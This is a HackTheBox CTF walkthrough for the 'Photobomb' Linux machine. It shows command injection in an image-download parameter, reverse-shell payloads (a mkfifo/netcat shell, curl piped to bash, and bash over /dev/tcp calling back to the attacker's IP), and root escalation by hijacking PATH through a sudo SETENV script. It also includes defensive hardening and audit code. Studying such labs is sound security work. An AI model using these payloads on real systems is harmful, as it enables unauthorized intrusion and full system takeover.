# Photobomb

Photobomb is an easy-rated Linux machine from [HackTheBox](https://app.hackthebox.com/machines/297), created by slartibartfast. In this post, my IP is 10.10.14.56 and the target IP is 10.129.228.60.

### Recon

The first steps are about gathering basic information about the target, using nmap and looking through the website.

{% code title="Local Terminal" %}

```bash
$ ping -c 1 10.129.228.60

Pinging 10.129.228.60 with 32 bytes of data:
Reply from 10.129.228.60: bytes=32 time=197ms TTL=63
Reply from 10.129.228.60: bytes=32 time=194ms TTL=63
Reply from 10.129.228.60: bytes=32 time=197ms TTL=63
Reply from 10.129.228.60: bytes=32 time=185ms TTL=63

Ping statistics for 10.129.228.60:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 185ms, Maximum = 197ms, Average = 193ms
```

{% endcode %}

From the TTL of 63 we can assume that it is a Linux machine.

{% code title="Local Terminal" %}

```bash
$ nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.228.60 -oN Ports

Nmap scan report for 10.129.228.60
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2023-06-08 11:19:12 Pacific SA Standard Time for 17s
Not shown: 65436 closed tcp ports (reset), 97 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 17.16 seconds
           Raw packets sent: 80781 (3.554MB) | Rcvd: 78472 (3.139MB)
```

{% endcode %}

{% code title="Local Terminal" %}

```bash
$ nmap -sCV -p 22,80,33060 10.129.167.56 -oN Target

Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-08 11:19 Pacific SA Standard Time
Nmap scan report for 10.129.228.60
Host is up (0.18s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.27 seconds
```

{% endcode %}

If you search for "OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 launchpad", you can find the specific release; in this case the result was "Ubuntu Focal". This can be useful when looking for a vulnerability in a specific version.

What we know so far: there is a website on port 80 served by nginx/1.18.0.

Because of the message "Did not follow redirect to <http://photobomb.htb/>", we have to [add the hostname to /etc/hosts](/cybersecurity/cybersecurity/tip-and-tricks/add-host.md).

{% code title="Local Terminal" %}

```bash
$ whatweb photobomb.htb

http://photobomb.htb [200 OK] Country[RESERVED][ZZ], HTML5, 
HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.129.228.60], Script, 
Title[Photobomb], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN],
 X-XSS-Protection[1; mode=block], nginx[1.18.0]
```

{% endcode %}

Nothing unusual.

* Browser > <http://photobomb.htb/>

<figure><img src="/files/cZOoYCtk2Ojm9YWKAfbs" alt=""><figcaption><p>view:source, there is an interesting JavaScript URL.</p></figcaption></figure>

* Browser  > <http://photobomb.htb/photobomb.js>

<figure><img src="/files/4ZlaBNFPDYrkbSpcoaPn" alt=""><figcaption><p>URL with possible credentials, using the structure http://<strong>user</strong>:<strong>pass</strong>@<strong>url</strong>   pH0t0:b0Mb!</p></figcaption></figure>

* Browser > <http://photobomb.htb/printer>

After logging in, you can see that there are a lot of images; download one with the "downloader" below and analyze it with **exiftool**.

{% code title="Local Terminal" %}

```bash
$ exiftool image.jpg
ExifTool Version Number         : 12.40
File Name                       : image.jpg
Directory                       : .
File Size                       : 267 KiB
File Modification Date/Time     : 2023:06:08 11:57:20-04:00
File Access Date/Time           : 2023:06:08 11:57:47-04:00
File Inode Change Date/Time     : 2023:06:08 11:57:46-04:00
<...>
```

{% endcode %}

Nothing here.

### Reverse Shell \[wizard]

Let's intercept the download process with **Burp Suite**.

<figure><img src="/files/c79dwZXBwVLitKSiR3IT" alt=""><figcaption></figcaption></figure>

Here we can find 3 parameters; the server may be passing them to a shell command. To test whether it's vulnerable to a **Command Injection**, you can simply append **;sleep+5** to one of them.

It fails at **photo**, but works at **filetype**.

<figure><img src="/files/sKM6sqzNdfSpU6Xh0TS0" alt=""><figcaption><p>It took 5 seconds to respond, works!</p></figcaption></figure>
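To make the injection point concrete from the defender's side, here is an added Python model of the download handler (example code written for this post, not the application's own source): the vulnerable version pastes `photo` and `filetype` into one shell string, while the hardened version allowlists both parameters and passes an argv list so no shell ever parses them. The `convert` invocation, the `source_images` directory and the allowlist are assumptions.

```python
import re
import subprocess

# Constructed model of the /printer download handler; the real application's
# source is not on the page. The `convert` invocation, the source directory and
# the allowlist below are assumptions made for this example.
SOURCE_DIR = "source_images"
ALLOWED_FILETYPES = {"jpg", "png"}
# Plain filename only: no '/', no shell metacharacters.
SAFE_PHOTO = re.compile(r"^[A-Za-z0-9_-]+\.(jpg|png)$")


def vulnerable_command(photo, filetype):
    """The injectable pattern: request parameters are pasted into a single
    string that is later run with shell=True. Because ';' is a command
    separator to the shell, a filetype of "jpg;sleep 5" appends a second
    command, which is exactly the 5-second delay observed above."""
    return f"convert {SOURCE_DIR}/{photo} {filetype}:/tmp/out.{filetype}"


def validate(photo, filetype):
    """Reasons a request must be rejected (empty list means accept). Logging
    rejected requests gives a cheap detection signal for injection probing."""
    reasons = []
    if not SAFE_PHOTO.match(photo):
        reasons.append("photo is not a plain image filename")
    if filetype not in ALLOWED_FILETYPES:
        reasons.append("filetype is not in the allowlist")
    return reasons


def hardened_command(photo, filetype):
    """Allowlist both parameters, then build an argv list: with shell=False the
    list goes straight to execve, so no shell ever parses user input and any
    stray metacharacter stays a literal byte inside one argument."""
    problems = validate(photo, filetype)
    if problems:
        raise ValueError("; ".join(problems))
    return ["convert", f"{SOURCE_DIR}/{photo}", f"{filetype}:/tmp/out.{filetype}"]


def run_hardened(photo, filetype):
    # Not called in the demo: it requires ImageMagick's `convert` on PATH.
    return subprocess.run(hardened_command(photo, filetype), shell=False, check=True)


if __name__ == "__main__":
    probe = "jpg;sleep 5"        # the same probe used with Burp above
    print("vulnerable builds:", vulnerable_command("cat.jpg", probe))
    print("hardened argv:    ", hardened_command("cat.jpg", "jpg"))
    try:
        hardened_command("cat.jpg", probe)
    except ValueError as err:
        print("hardened rejects: ", err)
```

The allowlist is the important part: escaping alone is fragile, whereas rejecting anything outside a small set of expected values and never invoking a shell removes the injection surface entirely.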

Here we can test whether the target can connect back to our machine, using netcat.

{% embed url="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" %}

{% code title="Local Terminal" %}

```bash
$ nc -nlvp 443
```

{% endcode %}

{% code title="Request Payload" %}

```bash
;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.56+443+>/tmp/f
```

{% endcode %}

<figure><img src="/files/pXTyp3Vk1ypRwJVXohj8" alt=""><figcaption><p>Request content, with the previous payload</p></figcaption></figure>

And your local terminal now has a shell as \[www-data].

#### Alternative

But what if the target machine doesn't have netcat installed? First, you can test the connection by using curl against an http.server on your machine.

{% code title="Local Terminal" %}

```bash
$ python3 -m http.server 80
```

{% endcode %}

{% code title="Request Payload" %}

```bash
;curl+10.10.14.56
```

{% endcode %}

If the http.server receives a request, you can do the following to connect:

1. Create a file with **vi index.html**

{% code title="index.html" %}

```bash
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.56/443 0>&1
```

{% endcode %}

2. Open an http.server

{% code title="Local Terminal" %}

```bash
$ python3 -m http.server 80
```

{% endcode %}

3. Send a request with the following payload

{% code title="Request Payload" %}

```bash
;curl+10.10.14.56|bash
```

{% endcode %}

### Privilege Escalation

Once inside the machine, do a [Bash Upgrade](/cybersecurity/cybersecurity/tip-and-tricks/bash-upgrade.md) before anything else.

{% code title="Target Terminal \[Wizard]" %}

```bash
wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
ad0f6c79c2897bd42cfb3be6cc74878e
```

{% endcode %}

{% code title="Target Terminal \[Wizard]" %}

```bash
wizard@photobomb:~/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

wizard@photobomb:~/photobomb$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
```

{% endcode %}

There is a custom script that wizard can run with sudo; let's see what's inside with **cat /opt/cleanup.sh**

{% code title="Target Terminal \[Wizard]" %}

```bash
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
```

{% endcode %}

In Linux, **\[** is itself a command; you can check whether it exists with **which \[**.

Here that command and **find** are invoked by name rather than by absolute path, which means we can change PATH so that a different binary is executed instead.
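As an added defensive example (not part of the original writeup), the following Python script audits a sudo-allowed shell script for command names that bash would resolve through PATH and checks whether the sudoers entry grants SETENV, which together are the conditions this escalation depends on. The copy of /opt/cleanup.sh is embedded from the listing above; the sudoers line is reconstructed from the `sudo -l` output (its exact text in /etc/sudoers is an assumption), and the hardened script is a proposed fix, not something present on the target.

```python
import re
import shlex

# Copy of /opt/cleanup.sh as listed above, embedded so the audit runs offline.
CLEANUP_SH = """#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \\;
"""

# Reconstructed from the `sudo -l` output; the exact /etc/sudoers text is an assumption.
SUDOERS_LINE = "wizard ALL=(root) SETENV: NOPASSWD: /opt/cleanup.sh"

# Proposed fix (constructed): pin PATH inside the script, call binaries by
# absolute path, and drop SETENV from the sudoers entry.
HARDENED_SH = """#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /home/wizard/photobomb
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
/usr/bin/find source_images -type f -name '*.jpg' -exec /bin/chown root:root {} \\;
"""
HARDENED_SUDOERS = "wizard ALL=(root) NOPASSWD: /opt/cleanup.sh"

# Words bash handles itself, so PATH is never consulted for them.
KEYWORDS = {"if", "then", "else", "elif", "fi", "while", "until", "do", "done",
            "for", "in", "case", "esac", "!", "{", "}"}
BUILTINS = {".", "source", "cd", "[", "test", "echo", "export", "exit", "read",
            "set", "unset", "shift", "return", "true", "false", "local"}
SEPARATORS = {";", "&&", "||", "|", "&", "(", ")"}
EXEC_FLAGS = {"-exec", "-execdir", "-ok", "-okdir"}  # find(1) spawns these through PATH too


def tokenize(line):
    """Split one shell line into words, keeping ; | & ( ) as separate tokens."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def command_words(script):
    """Every command name the script would execute, in order of appearance."""
    found = []
    for line in script.splitlines():
        expect_command = True
        for tok in tokenize(line):
            if tok in SEPARATORS or tok in EXEC_FLAGS:
                expect_command = True          # a new simple command starts next
            elif expect_command and tok in KEYWORDS:
                continue                       # 'if', '!', ... precede the real command
            elif expect_command:
                found.append(tok)
                expect_command = False
    return found


def path_dependent(script):
    """Command names that are neither builtins nor absolute paths: bash resolves
    them via PATH, so whoever controls PATH controls what actually runs."""
    return sorted({w for w in command_words(script)
                   if not w.startswith("/") and w not in BUILTINS})


def audit(script, sudoers_line):
    """Findings for a script that sudo lets a user run as root."""
    findings = []
    relative = path_dependent(script)
    if relative:
        findings.append("commands resolved through PATH: " + ", ".join(relative))
        if not re.search(r"^\s*(export\s+)?PATH=", script, re.M):
            findings.append("script does not pin its own PATH")
        if "SETENV:" in sudoers_line:
            findings.append("sudoers grants SETENV, so the caller chooses PATH for those commands")
    return findings


if __name__ == "__main__":
    for name, script, rule in (("cleanup.sh", CLEANUP_SH, SUDOERS_LINE),
                               ("hardened", HARDENED_SH, HARDENED_SUDOERS)):
        print(name, audit(script, rule) or ["no findings"])
```

Note that the audit also reports `chown`, which `find -exec` spawns through the same PATH lookup, so the hardened script calls it by absolute path as well. Even without SETENV, sudo's `secure_path` only protects commands that are looked up through PATH at all; pinning PATH inside any script that sudo runs as root is the cheap, robust fix.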

{% code title="Target Terminal \[Wizard]" %}

```bash
$ cd /tmp

$ nano find
```

{% endcode %}

{% code title="find" %}

```bash
bash -p
```

{% endcode %}

{% code title="Target Terminal \[Wizard]" %}

```bash
chmod +x find
```

{% endcode %}

Now we change the PATH used by the script; remember that thanks to **SETENV** we are allowed to set environment variables through sudo.

{% code title="Target Terminal \[Wizard]" %}

```bash
sudo PATH=/tmp:$PATH /opt/cleanup.sh
```

{% endcode %}

{% code title="Target Terminal \[Root]" %}

```bash
$ cat /root/root.txt
5e34e0049aa430f82876322e4ef75676
```

{% endcode %}
